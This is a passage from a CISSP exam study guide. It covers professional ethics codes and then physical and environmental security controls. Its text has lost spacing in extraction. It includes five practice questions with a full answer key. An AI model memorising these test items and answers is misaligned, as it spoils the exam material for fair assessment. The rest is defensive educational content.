atthefollowingWebsite:h p://www.isc2.org/ethics/default.aspx.
The(ISC)2CodeofEthicsincludesthepreamble,canons,andguidance.The
preambleistheintroductiontothecode.Thecanonsaremandatory:you
mustfollowthemtobecome(andremain)aCISSP.Theguidanceis
advisory(notmandatory):itprovidessupportinginformationforthe
canons.
TheCodeofEthicspreambleisquotedhere:Safetyofthecommonwealth,
dutytoourprincipals,andtoeachotherrequiresthatweadhere,andbeseen
toadhere,tothehighestethicalstandardsofbehavior.Therefore,strict
adherencetothisCodeisaconditionofcertication.

The (ISC) Code of Ethics Canons in detail

2

Therst,andthereforemostimportant,canonofthe(ISC) CodeofEthics
requirestheinformationsecurityprofessionaltoprotectsociety,the
commonwealth,andtheinfrastructure.

Thefocusoftherstcanonisonthe

publicandtheirunderstandingandfaithininformationsystems.Security
professionalsarechargedwiththepromotingofsafesecuritypracticesand
be eringthesecurityofsystemsandinfrastructureforthepublicgood.
2

Thesecondcanoninthe(ISC) CodeofEthicschargesinformationsecurity
professionalstoacthonorably,honestly,justly,responsibly,andlegally.

The

(ISC) CodeofEthicssuggeststhatprioritybegiventothejurisdictionin
whichservicesarebeingprovided.Anotherpointmadebythiscanonis
relatedtoprovidingprudentadviceandcautioningthesecurityprofessional
fromunnecessarilypromotingfear,uncertainty,anddoubt.
2

The(ISC) CodeofEthicsthirdcanonrequiresthatsecurityprofessionals
providediligentandcompetentservicetoprincipals.

Thefocusofthiscanonis

ensuringthatthesecurityprovidesqualityserviceforwhichsheisqualied
andwhichmaintainsthevalueandcondentialityofinformationandthe

associatedsystems.Anadditionalconsiderationistoensurethatthe
professionaldoesnothaveaconictofinterestinprovidingqualityservices.
2

Thefourthandnalcanoninthe(ISC) CodeofEthicsmandatesthat
informationsecurityprofessionalsadvanceandprotecttheprofession.

This

canonrequiresthatthesecurityprofessionalsmaintaintheirskillsand
advancetheskillsandknowledgeofothers.Also,thiscanonrequiresthat
individualsensurenottonegativelyimpactthesecurityprofessionby
associatinginaprofessionalfashionwiththosewhomightharmthe
profession.

D i d Yo u K n o w ?
The(ISC)2CodeofEthicsishighlytestable,includingapplyingthe
canonsinorder.Youmaybeaskedforthebestethicalanswer,whenall
answersareethical,perthecanons.Inthatcase,choosetheanswerthatis
mentionedrstinthecanons.Also,themostethicalanswerisusuallythe
best:holdyourselftoaveryhighethicallevelonquestionsposedduring
theexam.

Computer Ethics Institute

TheComputerEthicsInstituteprovidestheirTenCommandmentsofComputer
Ethicsasacodeofcomputerethics.Thecodeisbothshortandfairly
straightforward.BoththenameandformatarereminiscentoftheTen
CommandmentsofJudaism,Christianity,andIslam,butthereisnothing
overtlyreligiousinnatureabouttheComputerEthicsInstitutesTen
Commandments.TheComputerEthicsInstitutesTenCommandmentsof
ComputerEthicsare:
1.Thoushaltnotuseacomputertoharmotherpeople.
2.Thoushaltnotinterferewithotherpeoplescomputerwork.
3.Thoushaltnotsnooparoundinotherpeoplescomputerles.

4.Thoushaltnotuseacomputertosteal.
5.Thoushaltnotuseacomputertobearfalsewitness.
6.Thoushaltnotcopyoruseproprietarysoftwareforwhichyouhavenot
paid.
7.Thoushaltnotuseotherpeoplescomputerresourceswithout
authorizationorpropercompensation.
8.Thoushaltnotappropriateotherpeoplesintellectualoutput.
9.Thoushaltthinkaboutthesocialconsequencesoftheprogramyouare
writingorthesystemyouaredesigning.
10.Thoushaltalwaysuseacomputerinwaysthatensureconsiderationand
respectforyourfellowhumans.

IAB's Ethics and the Internet

MuchlikethefundamentalprotocolsoftheInternet,theInternetActivities
Boards(IAB)codeofethics,EthicsandtheInternet,isdenedinanRFC
document.RFC1087,EthicsandtheInternet,waspublishedin1987to
presentapolicyrelatingtoethicalbehaviorassociatedwiththeInternet.
AccordingtotheIAB,thefollowingpracticeswouldbeconsideredunethical
behaviorifsomeonepurposely:
SeekstogainunauthorizedaccesstotheresourcesoftheInternet;
DisruptstheintendeduseoftheInternet;
Wastesresources(people,capacity,computer)throughsuchactions;
Destroystheintegrityofcomputerbasedinformation;
Compromisestheprivacyofusers.

Summary of exam objectives

Anunderstandingandappreciationoflegalsystems,concepts,andtermsare
requiredofaninformationsecuritypractitionerworkingintheinformation

centricworldtoday.Maintainingtheintegrityofevidence,usinghashing
algorithmsfordigitalevidence,andmaintainingaprovablechainofcustody
arevital.
Finally,thenatureofinformationsecurityandtheinherentsensitivitytherein
makeethicalframeworksanadditionalpointrequiringa ention.Thischapter
presentedtheIABsRFConEthicsandtheInternet,theComputerEthics
2

InstitutesTenCommandmentsofComputerEthics,andthe(ISC) Codeof
Ethics.TheCISSPexamwill,nodoubt,emphasizetheCodeofEthics
proeredby(ISC)2,whichpresentsanorderedsetoffourcanonsthata end
toma ersofthepublic,theindividualsbehavior,providingcompetent
service,andtheprofessionasawhole.

TOP FIVE TOUGHEST QUESTIONS

1.Withoutthe_______orsomeotherseparateagreement,theEUData
ProtectionDirectivewouldcausechallengeswithsharingdatawithUS
entitiesduetotheUnitedStatesperceivedlesserconcernforprivacy.
A.USEUSafeHarbor
B.EUPrivacyHarbordoctrine
C.IdentityTheftEnforcementandRestitutionAct
D.USFederalPrivacyAct
2.Whatcanbeusedtomakeanexactreplicaofharddiskdriveaspartofthe
evidenceacquisitionprocess?
A.Diskimagingsoftware
B.Partitionarchivaltool
C.Binarybackuputility
D.Memorydumper
3.Whichofthefollowingdenedprotectedcomputersandcriminalized
a acksagainstthem?

A.PatriotAct
B.ComputerFraudandAbuseAct
C.ECPA
D.IdentityTheftEnforcementandRestitutionAct
4.Whichcanonofthe(ISC)2CodeofEthicsshouldbeconsideredthemost
important?
A.Protectsociety,thecommonwealth,andtheinfrastructure
B.Advanceandprotecttheprofession
C.Acthonorably,honestly,justly,responsibly,andlegally
D.Providediligentandcompetentservicetoprincipals
5.Whichprinciplerequiresthatanorganizationsstakeholdersactprudently
inensuringthattheminimumsafeguardsareappliedtotheprotectionof
corporateassets?
A.Dueprotection
B.Dueprocess
C.Duediligence
D.Duecare

ANSWERS
1.Correctanswerandexplanation:A.AnswerAiscorrect;theUSEUSafe
HarboragreementprovidesaframeworkbywhichUScompaniescanbe
consideredsafeforEUstatesandcompaniestosharedatawith.
Incorrectanswersandexplanations:B,C,andD.AnswersB,C,andDare
incorrect.TheEUPrivacyHarbordoctrineissimplyamadeupanswer
choice.TheothertwooptionspresentlegitimateUSlawsimportantto
informationsecurity,butneitherspecicallyaddressestheissuesregarding
datasharingwiththeEU.

2.Correctanswerandexplanation:C.AnswerCiscorrect;abinarybackup
utilityiswhatisneededtoensurethateverysinglebitonaharddriveis
copied.Slackandunallocatedspaceisneededforaforensicallysoundimage.
Incorrectanswersandexplanations:A,B,andD.AnswersA,B,andDare
incorrect.Themostviable,butincorrect,choicewasA,diskimagingsoftware.
Whilesomediskimagingsoftwareprovidesbitbybitbackupcapabilities,
typicalusagewillonlyacquireallocatedspace.D,memorydumper,would
applytophysicalmemoryratherthanaharddiskdrive.Bisjustamadeup
phrasethatsoundslegitimate.
3.Correctanswerandexplanation:B.AnswerBiscorrect;theComputer
FraudandAbuseAct,pennedin1984,isstillanimportantpieceoflegislation
fortheprosecutionofcomputercrime.TheComputerFraudandAbuseAct
denedprotectedcomputers,whichwereintendedtobesystemsinwhich
thefederalgovernmenthadaparticularinterest.Thelawsetabarof$5000in
damagesduring1yearinorderfortheacttoconstituteacrime.
Incorrectanswersandexplanations:A,C,andD.AnswersA,C,andDare
incorrect.ThePatriotActlessenedsomeoftherestrictionsonlaw
enforcementrelatedtoelectronicmonitoring.ECPAisconcernedwiththe
wiretappingofelectroniccommunications.TheIdentityTheftEnforcement
andRestitutionActof2008amendedtheComputerFraudandAbuseActto
makesomeoftheconsiderationsmoremodern.
4.Correctanswerandexplanation:A.AnswerAiscorrect;toprotectsociety,
thecommonwealth,andtheinfrastructureistherstcanonandisthusthe
2

mostimportantofthefourcanonsofthe(ISC) CodeofEthics.
Incorrectanswersandexplanations:B,C,andD.AnswersB,C,andDare
incorrect.Thecanonsofthe(ISC)2CodeofEthicsarepresentedinorderof
importance.Thesecondcanonrequiresthesecurityprofessionaltoact
honorably,honestly,justly,responsibly,andlegally.Thethirdmandatesthat
professionalsprovidediligentandcompetentservicetoprincipals.Thenal,
andthereforeleastimportant,canonwantsprofessionalstoadvanceand
protecttheprofession.
5.Correctanswerandexplanation:D.AnswerDiscorrect;duecareprovides
aminimumstandardofcarethatmustbemet.Therearenoexplicit
requirementsthatdenewhatconstitutesduecare.Rather,duecarerequires
actinginaccordwithwhataprudentpersonwouldconsiderreasonable.

Incorrectanswersandexplanations:A,B,andC.AnswersA,B,andCare
incorrect.Dueprotectionisamadeupphrasethathasnolegalstanding.Due
processisrelatedtoensuringthatdefendantsaretreatedfairlyinlegal
proceedingswithrespecttotheirconstitutionalrights.Duediligenceisthe
mostcloselyrelatedtermtothecorrectanswer,duecare.However,due
diligencehasafocusoncontinuallyinvestigatingbusinesspracticestoensure
thatduecareismaintained.
1

(ISC) CodeofEthics.Availablefrom

h p://www.isc2.org/ethics/default.aspx[accessedMay22,2013].
2

Ibid.

Ibid.

Ibid.

Ibid.

ComputerEthicsInstitute,1992TenCommandmentsofComputerEthics.

Availablefrom
h p://computerethicsinstitute.org/publications/tencommandments.html
[accessedMay22,2013].
7

InternetActivitiesBoard,1989RFC1087EthicsandtheInternet.

Availablefromh p://tools.ietf.org/html/rfc1087[accessedMay22,2013].

CHAPTER10

Domain 10: Physical (Environment

al) Security
Abstract
ThischaptercoversDomain10oftheCISSP,Physical(Environmental)
Security.Theprimarygoalofthiscontentistoensurethatthesafetyof
personnelisakeyconsiderationwhenconsideringphysicaland
environmentalsecurity.Toensurethissafetyrequiresanunderstandingof
commonissuesthatcouldnegativelyimpactpersonnelssafety,suchasre,
smoke,ood,andtoxins,withparticularemphasisonsmokeandre
detectionandsuppression.Physicalsecurityistheothermainfocusofthis
chapteranda entionisgiventophysicalaccesscontrolma ersincluding
fences,gates,lights,cameras,locks,mantraps,andguards.

KEYWORDS
Mantrap;Bollard;Smartcard;Tailgating;Degaussing;Destruction;
Shredding;MontrealAccord

Exam Objectives in This Chapter

PerimeterDefenses
SiteSelection,Design,andConguration
SystemDefenses
EnvironmentalControls

Introduction

Physical(environmental)securityprotectsthecondentialityandintegrityof
physicalassets:people,buildings,systems,anddata.TheCISSPexam
considershumansafetyasthemostcriticalconcernofthisdomain,which
trumpsallotherconcerns.

PERIMETER DEFENSES
Perimeterdefenseshelpprevent,detect,andcorrectunauthorizedphysical
access.Buildings,likenetworks,shouldemploydefenseindepth.Anyone
defensemayfail,socriticalassetsshouldbeprotectedbymultiplephysical
securitycontrols,suchasfences,doors,walls,locks,etc.Theidealperimeter
defenseissafe,preventsunauthorizedingress,and,whenapplicable,oers
bothauthenticationandaccountability.
Fences

Fencesmayrangefromsimpledeterrents(suchas3ft/1mtallfencing)to
preventivedevices,suchasan8ft(2.4m)tallfencewithbarbedwireontop.
Fencesshouldbedesignedtosteeringressandegresstocontrolledpoints,
suchasexteriordoorsandgates.
Gates

Gatesrangeinstrengthfromornamental(aclassIgatedesignedtodeter
access)toaclassIVgatedesignedtopreventacarfromcrashingthrough
(suchasgatesatairportsandprisons).Formoreinformation,seeASTM
InternationalsASTMF2200StandardSpecicationforAutomated
VehicularGateConstructionath p://www.astm.org/Standards/F2200.htm.

FastFacts
Herearethefourclassesofgates:
ClassI:Residential(homeuse)
ClassII:Commercial/GeneralAccess(parkinggarage)
ClassIII:Industrial/LimitedAccess(loadingdockfor18wheelertrucks)
ClassIV:RestrictedAccess(airportorprison)

Bollards

Atracbollardisastrongpostdesignedtostopacar.Thetermderivesfrom
theshort/strongposts(calledmooringbollards)usedtotieshipstopiers
whendocked.
Lights

Lightscanactasbothadetectiveanddeterrentcontrol.Lightshouldbe
brightenoughtoilluminatethedesiredeldofvision(theareabeing
protected).TypesoflightsincludeFresnel;thesearethesametypeoflights
originallyusedinlighthouses,whichusedFresnellensestoaimlightina
specicdirection.
Lightmeasurementtermsincludelumen,theamountoflightonecandle
creates.Lightwashistoricallymeasuredinfootcandles;onefootcandleisone
lumenpersquarefoot.Lux,basedonthemetricsystem,ismorecommonly
usednow:oneluxisonelumenpersquaremeter.
CCTV

ClosedCircuitTelevision(CCTV)isadetectivedeviceusedtoaidguardsin
detectingthepresenceofintrudersinrestrictedareas.CCTVsusingthe
normallightspectrumrequiresucientvisibilitytoilluminatetheeldof
viewthatisvisibletothecamera.Infrareddevicescanseeinthedarkby
displayingheat.Oldertubecamerasareanalogdevices.Moderncameras
useCCD(ChargedCoupledDischarge),whichisdigital.
CCTVcamerasmayalsohaveothertypicalcamerafeaturessuchaspanand
tilt(movinghorizontallyandvertically).
MagnetictapesuchasVHSisusedtobackupimagesfromtubecameras.
CCDcamerasuseDVR(DigitalVideoRecorder)orNVR(NetworkVideo
Recorder)forbackups.
Locks

Locksareapreventivephysicalsecuritycontrol,usedondoorsandwindows
topreventunauthorizedphysicalaccess.Locksmaybemechanical,suchas
keylocksorcombinationlocks,orelectronic,whichareoftenusedwithsmart

cardsormagneticstripecards.
Key locks

Keylocksrequireaphysicalkeytounlock.Keysmaybesharedorsometimes
copied,whichlowerstheaccountabilityofkeylocks.Acommontypeisthe
pintumblerlock,whichhastwosetsofpins:driverpinsandkeypins.The
correctkeymakesthepinslineupwiththeshearline,allowingthelock
tumbler(plug)toturn.
Wardorwardedlocksmustturnakeythroughchannels(calledwards);a
skeletonkeyisdesignedtoopenvarietiesofwardedlocks.
Combination locks

Combinationlockshavedialsthatmustbeturnedtospecicnumbers,ina
specicorder(alternatingclockwiseandcounterclockwiseturns)tounlock.
Bu onorkeypadlocksalsousenumericcombinations.Limited
accountabilityduetosharedcombinationsistheprimarysecurityissue
concerningthesetypesoflocks.
Smart cards and magnetic stripe cards

Asmartcardisaphysicalaccesscontroldevicethatisoftenusedforelectronic
locks,creditcardpurchases,ordualfactorauthenticationsystems.Smart
meansthecardcontainsacomputercircuit.
Smartcardsmaybecontactorcontactless.Contactcardsmustbe
insertedintoasmartcardreader,whilecontactlesscardsarereadwirelessly.
OnetypeofcontactlesscardtechnologyisRadioFrequencyIdentication
(RFID).ThesecardscontainRFIDtags(alsocalledtransponders)thatareread
byRFIDtransceivers.
Amagneticstripecardcontainsamagneticstripethatstoresinformation.
Unlikesmartcards,magneticstripecardsarepassivedevicesthatcontainno
circuits.Thesecardsaresometimescalledswipecards:theyareusedby
swipingthroughacardreader.
Tailgating/piggybacking

Tailgating(alsoknownaspiggybacking)occurswhenanunauthorizedperson
followsanauthorizedpersonintoabuildingaftertheauthorizedperson
unlocksandopensthedoor.Policyshouldforbidemployeesfromallowing

tailgatingandsecurityawarenesseortsshoulddescribethisrisk.
Mantraps and turnstiles

Amantrapisapreventivephysicalcontrolwithtwodoors.Therstdoor
mustcloseandlockbeforetheseconddoormaybeopened.Eachdoor
typicallyrequiresaseparateformofauthenticationtoopen.Theintruderis
trappedbetweenthedoorsafterenteringthemantrap.
Turnstilesaredesignedtopreventtailgatingbyenforcingaonepersonper
authenticationrule,justastheydoinsubwaysystems.
Contraband checks

Contrabandchecksseektoidentifyobjectsthatareprohibitedtoenterasecure.
Thesechecksareoftenusedtodetectmetals,weapons,orexplosives.
Contrabandchecksarecasuallythoughttobeadetectivecontrol,buttheir
presencebeingknownmakesthemalsoadeterrenttoactualthreats.
Motion detectors and other perimeter alarms

UltrasonicandmicrowavemotiondetectorsworklikeDopplerradarusedto
predicttheweather.Awaveofenergyissentout,andtheechoisreturned
whenitbouncesoanobject.Theechowillbereturnedmorequicklywhena
newobject(suchasapersonwalkinginrangeofthesensor)reectsthewave.
Aphotoelectricmotionsensorsendsabeamoflightacrossamonitoredspaceto
aphotoelectricsensor.Thesensoralertswhenthelightbeamisbroken.
Ultrasonic,microwave,andinfraredmotionsensorsareactivesensors,which
meanstheyactivelysendenergy.Apassivesensorcanbethoughtofasa
readonlydevice.Anexampleisapassiveinfrared(PIR)sensor,whichdetects
infraredenergycreatedbybodyheat.
Doors and windows

Alwaysconsidertherelativestrengthsandweaknessesofdoors,windows,
walls,oors,ceilings,etc.Allshouldbeequallystrongfromadefensive
standpoint:a ackerswilltargettheweakestlinkinthechainandshould
notndaweakspottoexpose.
Egressmustbeunimpededincaseofemergency,soasimplepushbu onor
motiondetectorsarefrequentlyusedtoallowegress.Externallyfacing

emergencydoorsshouldbemarkedforemergencyuseonlyandequipped
withpanicbars.Theuseofapanicbarshouldtriggeranalarm.
Glasswindowsarestructurallyweakandcanbedangerouswhensha ered.
Bulletprooforexplosiveresistantglasscanbeusedforsecuredareas.Wire
meshorsecuritylmcanlowerthedangerofsha eredglassandprovide
additionalstrength.Alternativestoglasswindowsincludepolycarbonate
suchasLexanandacrylicsuchasPlexiglass.
Walls, floors, and ceilings

Wallsaroundanyinternalsecureperimetersuchasadatacentershouldbe
slabtoslab,meaningtheyshouldstartattheoorslabandruntothe
ceilingslab.Raisedoorsanddropceilingscanobscurewherethewallstruly
startandstop.Ana ackershouldnotbeabletocrawlunderawallthatstops
atthetopoftheraisedoororclimboverawallthatstopsatthedropceiling.
Guards

Guardsareadynamiccontrolthatmaybeusedinavarietyofsituations.
Guardsmayaidininspectionofaccesscredentials,monitorCCTVs,monitor
environmentalcontrols,respondtoincidents,actasadeterrent(allthings
beingequal,criminalsaremorelikelytotargetanunguardedbuildingovera
guardedbuilding),andmuchmore.
Professionalguardshavea endedadvancedtrainingand/orschooling;
amateurguards(sometimesderogativelycalledMallCops)havenot.The
termpseudoguardmeansanunarmedsecurityguard.
Dogs

Dogsprovideperimeterdefenseduties,guardingarigidturf.Theyare
oftenusedincontrolledareas,suchasbetweentheexteriorbuildingwalland
aperimeterfence.Theprimarydrawbacktousingdogsasaperimetercontrol
islegalliability.

SITE SELECTION, DESIGN, AND CONFIGURATION

Selection,design,andcongurationdescribetheprocessofbuildingasecure
facilitysuchasadatacenter,fromthesiteselectionprocessthroughthenal
design.
Site selection issues

Site selection issues

Siteselectionistheprocessofchoosingasitetoconstructabuildingordata
center.
Utility reliability

Thereliabilityoflocalutilitiesisacriticalconcernforsiteselectionpurposes.
Electricaloutagesareamongthemostcommonofallfailuresanddisasters
weexperience.UninterruptiblePowerSupplies(UPSs)willprovide
protectionagainstelectricalfailureforashortperiod(usuallyhoursorless).
Generatorsprovidelongerprotectionbutwillrequirerefuelinginorderto
operateforextendedperiods.
Crime

Localcrimeratesalsofactorintositeselection.Theprimaryissueisemployee
safety:allemployeeshavetherighttoasafeworkingenvironment.
Additionalissuesincludetheftofcompanyassets.
Site design and configuration issues

Oncethesitehasbeenselected,anumberofdesigndecisionsmustbemade.
Willthesitebeexternallymarkedasadatacenter?Istheresharedtenancyin
thebuilding?Whereisthetelecomdemarc(thetelecomdemarcationpoint)?
Site marking

Manydatacentersarenotexternallymarkedtoavoiddrawinga entionto
thefacility(andtheexpensivecontentswithin).Similarcontrolsinclude
a entionavoidingdetailssuchasmutedbuildingdesign.
Shared tenancy and adjacent buildings

Othertenantsinabuildingcaseposesecurityissues:theyarealreadybehind
thephysicalsecurityperimeter.Theirphysicalsecuritycontrolswillimpact
yours:atenantspoorvisitorsecuritypracticescanendangeryoursecurity,
forexample.
Adjacentbuildingsposeasimilarrisk.A ackerscanenteralesssecure
adjacentbuildingandusethatasabasetoa ackanadjacentbuilding,often
breakinginthroughasharedwall.
Acrucialissuetoconsiderinabuildingwithsharedtenancyisashared
demarc(thedemarcationpoint,wheretheISPs(InternetServiceProvider)

responsibilityendsandthecustomersbegins).Accesstothedemarcallows
a acksonthecondentiality,integrity,andavailabilityofallcircuitsandthe
dataowingoverthem.

SYSTEM DEFENSES
Systemdefensesareoneofthelastlinesofdefenseinadefenseindepth
strategy.Thesedefensesassumeana ackerhasphysicalaccesstoadeviceor
mediacontainingsensitiveinformation.Insomecases,othercontrolsmay
havefailedandthesecontrolsarethenalcontrolprotectingthedata.
Asset tracking

Detailedassettrackingdatabasesenhancephysicalsecurity.Youcannot
protectyourdataunlessyouknowwhere(andwhat)itis.Detailedasset
trackingdatabasessupportregulatorycompliancebyidentifyingwhereall
regulateddataiswithinasystem.Incaseofemployeetermination,theasset
databasewillshowexactlywhatequipmentanddatatheemployeemust
returntothecompany.Datasuchasserialnumbersandmodelnumbersis
usefulincasesoflossduetotheftordisaster.
Port controls

Moderncomputersmaycontainmultipleportsthatmayallowcopying
datatoorfromasystem.Portcontrolsarecriticalbecauselargeamountsof
informationcanbeplacedonadevicesmallenoughtoevadeperimeter
contrabandchecks.Portscanbephysicallydisabled;examplesinclude
disablingportsonasystemsmotherboard,disconnectinginternalwiresthat
connecttheporttothesystem,andphysicallyobstructingtheportitself.
Drive and tape encryption

Driveandtapeencryptionprotectsdataatrestandisoneofthefewcontrols
thatwillprotectdataafterphysicalsecurityhasbeenbreached.These
controlsarerecommendedforallmobiledevicesandmediacontaining
sensitiveinformationthatmayphysicallyleaveasiteorsecurityzone.Whole
diskencryptionofmobiledeviceharddrivesisrecommended.

D i d Yo u K n o w ?
ManybreachnoticationlawsconcerningPersonallyIdentiable

Information(PII)containexclusionsforlostdatathatisencrypted.

Media storage and transportation

Allsensitivebackupdatashouldbestoredosite,whethertransmi edo
sitevianetworksorphysicallymovedasbackupmedia.Sitesusingbackup
mediashouldfollowstrictproceduresforrotatingmediaosite.
Media cleaning and destruction

Allformsofmediashouldbesecurelycleanedordestroyedbeforedisposalto
preventobjectreuse,whichistheactofrecoveringinformationfrom
previouslyusedobjects,suchascomputerles.Objectsmaybephysical(such
aspaperlesinmanilafolders)orelectronic(dataonaharddrive).
Objectreusea acksrangefromnontechnicala ackssuchasdumpsterdiving
(searchingforinformationbyrummagingthroughunsecuredtrash)to
technicala ackssuchasrecoveringinformationfromunallocatedblocksona
diskdrive.
Paper shredders

Papershredderscutpapertopreventobjectreuse.Stripcutshredderscutthe
paperintoverticalstrips.Crosscutshreddersaremoresecurethanstripcut
andcutbothverticallyandhorizontally,creatingsmallpaperconfe i.
Overwriting

Overwritingwritesovereverycharacterofaleorentirediskdriveandisfar
moresecurethandeletingorforma ingadiskdrive.Commonmethods
includewritingallzeroesorwritingrandomcharacters.Electronicshredding
orwipingoverwritesthelesdatabeforeremovingtheFATentry.
Degaussing and destruction

Degaussinganddestructionarecontrolsusedtopreventobjectreusea acks
againstmagneticmediasuchasmagnetictapesanddiskdrives.
Degaussingdestroystheintegrityofmagneticmediasuchastapesordisk
drivesbyexposingthemtoastrongmagneticeld,destroyingtheintegrityof
themediaandthedataitcontains.

Destructionphysicallydestroystheintegrityofmagneticmediabydamaging
ordestroyingthemediaitself,suchasthepla ersofadiskdrive.Destructive
measuresincludeincineration,pulverizing,andbathingmetalcomponentsin
acid.

ENVIRONMENTAL CONTROLS
Environmentalcontrolsaredesignedtoprovideasafeenvironmentfor
personnelandequipment.Power,HVAC,andresafetyareconsidered
environmentalcontrols.
Electricity

Reliableelectricityiscriticalforanydatacenterandisoneofthetoppriorities
whenselecting,building,anddesigningasite.Electricalfaultsinvolveshort
andlongterminterruptionofpower,aswellasvariouscasesoflowandhigh
voltage.

CrunchTime
Thefollowingarecommontypesofelectricalfaults:
Blackout:prolongedlossofpower
Brownout:prolongedlowvoltage
Fault:shortlossofpower
Surge:prolongedhighvoltage
Spike:temporaryhighvoltage
Sag:temporarylowvoltage

Surge protectors, UPSs, and generators

Surgeprotectorsprotectequipmentfromdamageduetoelectricalsurges.
Theycontainacircuitorfusethatistrippedduringapowerspikeorsurge,
shortingthepowerorregulatingitdowntoacceptablelevels.

UninterruptiblePowerSupplies(UPSs)providetemporarybackuppowerin
theeventofapoweroutage.Theymayalsocleanthepower,protecting
againstsurges,spikes,andotherformsofelectricalfaults.
Generatorsaredesignedtoprovidepowerforlongerperiodsoftimesthan
UPSsandwillrunaslongasfuelisavailable.Sucientfuelshouldbestored
onsitefortheperiodthegeneratorisexpectedtoprovidepower.Refueling
strategiesshouldconsideradisasterseectonfuelsupplyanddelivery.
HVAC

HVAC(heating,ventilation,andairconditioning)controlskeeptheairata
reasonabletemperatureandhumidity.Theyoperateinaclosedloop,
recirculatingtreatedair.Thishelpsreducedustandotherairborne
contaminants.HVACunitsshouldemploypositivepressureanddrainage.
DatacenterHVACunitsaredesignedtomaintainoptimumtemperatureand
humiditylevelsforcomputers.Humiditylevelsof4055%arerecommended.
Acommonlyrecommendedsetpointtemperaturerangeforadatacenteris
6877F(2025C).
Static and corrosion

Staticismitigatedbymaintainingproperhumidity,groundingallcircuitsina
propermanner,andusingantistaticsprays,wriststraps,andworksurfaces.
Allpersonnelworkingwithsensitivecomputerequipmentsuchasboards,
modules,ormemorychipsshouldgroundthemselvesbeforeperformingany
work.
Highhumiditylevelscanallowthewaterintheairtocondenseonto(and
into)equipment,whichmayleadtocorrosion.Bothstaticandcorrosionare
mitigatedbymaintainingproperhumiditylevels.
Heat, flame, and smoke detectors

Heatdetectorsalertwhentemperatureexceedsanestablishedsafebaseline.
Theymaytriggerwhenaspecictemperatureisexceededorwhen
temperaturechangesataspecicrate.
Smokedetectorsworkthroughtwoprimarymethods:ionizationand
photoelectric.Ionizationbasedsmokedetectorscontainasmallradioactive
sourcethatcreatesasmallelectriccharge.Photoelectricsensorsworkina

similarfashion,exceptthattheycontainanLED(LightEmi ingDiode)anda
photoelectricsensorthatgeneratesasmallchargewhilereceivinglight.Both
typesofalarmalertwhensmokeinterruptstheradioactivityorlight,
loweringorblockingtheelectriccharge.
Flamedetectorsdetectinfraredorultravioletlightemi edinre.One
drawbacktothistypeofdetectionisthatthedetectorusuallyrequireslineof
sighttodetecttheame;smokedetectorsdonothavethislimitation.
Personnel safety, training, and awareness

Personnelsafetyisthenumberonegoalofphysicalsecurity.Thisincludesthe
safetyofpersonnelwhileonsiteando.Safetytrainingprovidesaskillset
suchaslearningtooperateanemergencypowersystem.Safetyawareness
changesuserbehavior(Dontletanyonefollowyouintothebuildingafter
youswipeyouraccesscard).Bothsafetytrainingandawarenessarecriticalto
ensurethesuccessofaphysicalsecurityprogram.Youcanneverassumethat
averagepersonnelwillknowwhattodoandhowtodoit:theymustbe
trainedandmadeaware.
Evacuation routes

Evacuationroutesshouldbeprominentlyposted,astheyareinhotelrooms.
Allpersonnelshouldbeadvisedofthequickestevacuationroutefromtheir
areas.Guestsshouldbeadvisedofevacuationroutesaswell.
Allsitesshoulduseameetingpoint,whereallpersonnelwillmeetinthe
eventofemergency.Meetingpointsarecritical:tragedieshaveoccurred
whereapersonoutsidethefrontofabuildingdoesnotrealizeanotheris
outsidethebackandreentersthebuildingfora emptedrescue.
Evacuation roles and procedures

Thetwoprimaryevacuationrolesaresafetywardenandmeetingpointleader.
Thesafetywardenensuresthatallpersonnelsafelyevacuatethebuildingin
theeventofanemergencyordrill.Themeetingpointleaderassuresthatall
personnelareaccountedforattheemergencymeetingpoint.Personnelmust
followemergencyproceduresandquicklyfollowthepostedevacuationroute
incaseofemergencyordrill.
ABCD fires and suppression

Theprimarysafetyissueincaseofreissafeevacuation.Firesuppression
systemsareusedtoextinguishres,anddierenttypesofresrequire
dierentsuppressiveagents.Thesesystemsaretypicallydesignedwith
personnelsafetyastheprimaryconcern.
Classes of fire and suppression agents

ClassAresarecommoncombustiblessuchaswood,paper,etc.Thistypeof
reisthemostcommonandshouldbeextinguishedwithwaterorsodaacid.
ClassBresareburningalcohol,oil,andotherpetroleumproductssuchas
gasoline.Theyareextinguishedwithgasorsodaacid.Youshouldneveruse
watertoextinguishaclassBre.
ClassCresareelectricalresthatarefedbyelectricityandmayoccurin
equipmentorwiring.Electricalresareconductiveres,andthe
extinguishingagentmustbenonconductive,suchasanytypeofgas.Many
sourceserroneouslylistsodaacidasrecommendedforclassCres:thisis
incorrect,assodaacidcanconductelectricity.
ClassDresareburningmetalsandareextinguishedwithdrypowder.
ClassKresarekitchenres,suchasburningoilorgrease.Wetchemicalsare
usedtoextinguishclassKres.Table10.1summarizesclassesofreand
suppressionagents.

Table10.1
ClassesofFireandSuppressionAgents

Types of fire suppression agents

Allresuppressionagentsworkviafourmethods(sometimesin
combination):reducingthetemperatureofthere,reducingthesupplyof
oxygen,reducingthesupplyoffuel,andinterferingwiththechemical
reactionwithinre.
Water

Watersuppressesrebyloweringthetemperaturebelowthekindlingpoint
(alsocalledtheignitionpoint).Wateristhesafestofallsuppressiveagentsand
recommendedforextinguishingcommoncombustibleressuchasburning
paperorwood.Itisimportanttocutelectricalpowerwhenextinguishinga
rewithwatertoreducetheriskofelectrocution.
Soda acid

Sodaacidextinguishersusesoda(sodiumbicarbonate)mixedwithwater,and
therewasaglassvialofacidsuspendedatthetop.Inadditiontosuppressing
rebyloweringtemperature,sodaacidalsohasadditionalsuppressive
propertiesbeyondplainwater:itcreatesfoamthatcanoatonthesurfaceof
someliquidres,starvingtheoxygensupply.
Dry powder

Extinguishingarewithdrypowder(suchassodiumchloride)worksby
loweringtemperatureandsmotheringthere,starvingitofoxygen.Dry
powderisprimarilyusedtoextinguishmetalres.Flammablemetalsinclude
sodium,magnesium,andmanyothers.
Wet chemical

Wetchemicalsareprimarilyusedtoextinguishkitchenres(typeKresin
theUnitedStatesandtypeFinEurope)butmayalsobeusedoncommon
combustibleres(typeA).Thechemicalisusuallypotassiumacetatemixed
withwater.Thiscoversagreaseoroilreinasoapylmthatlowersthe
temperature.
CO2

Firesrequireoxygenasfuel,soresmaybesmotheredbyremovingthe
oxygen:thisishowCO2resuppressionworks.AriskassociatedwithCO2is
thatitisodorlessandcolorless,andourbodieswillbreatheitasair.Bythe
timewebeginsuocatingduetolackofoxygen,itisoftentoolate.This
makesCO2adangeroussuppressiveagent,whichisonlyrecommendedin
unstaedareassuchaselectricalsubstations.
Halon and Halon substitutes

